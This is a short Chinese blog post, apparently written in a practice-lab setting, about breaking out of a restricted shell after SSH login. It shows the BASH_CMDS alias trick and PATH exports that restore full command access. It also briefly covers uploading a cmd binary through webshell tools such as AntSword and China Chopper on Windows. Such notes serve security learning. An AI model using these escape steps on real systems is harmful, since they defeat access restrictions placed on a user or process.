zoukankan
html css js c++ java
小记如何绕过受限的shell
今天的靶场登陆ssh后发现shell受限,如下
woami都执行不了,查看对应的bin目录,发现只能执行4个命令
在网上学到一招可以绕过这种受限制的被阉割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
/bin/bash
echo $0 #查看脚本本身的名字
echo $? #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
执行完上面加粗的四步之后就可以执行所有命令了
Windows中如果遇到此类情形
1.找到一处可上传文件的位置上传cmd
2.蚁剑可以自定义cmd的环境变量
使用菜刀同样上传cmd文件
设置cmd环境变量 终端输入 set cmd文件的物理地址
查看全文
相关阅读:
超全面的vue.js使用总结
Python3 [字典】类型 学习笔记
Python3 [集合]类型 学习笔记
Python 希尔排序法
Python 堆排序法
Python 归并排序法
Python 冒泡排序法
Python 选择排序法
Python 快速排序法(转)
Python 插入排序法
原文地址:https://www.cnblogs.com/sup3rman/p/12392161.html
最新文章
数据库中是数字但是显示需要汉字
计算机网络OSI模型
数据库基础知识2-添加约束
Sql Server基础知识
找不到 javax.servlet.http.HttpServletResponse 和 javax.servlet.http.HttpServletRequest 问题解决
Web应用开发(Servlet+html+Mysql)入门小示例
电脑配置小知识
Spring MVC基础了解
Java web开发了解
eclipse中的乱码问题
热门文章
数据库基础知识
vue-cli-webpake搭建和配置
移动端设置图片呗旋转了九十度
vue之store中属性更新用法
GIT主要用到的命令
GIT 常用命令
对html进行截图并保存为本地图片
js获取当前时间(昨天、今天、明天)
js获取ISO8601规范时间
伪数组以及伪数组与真正的数组之间的转换
Copyright © 2011-2022 走看看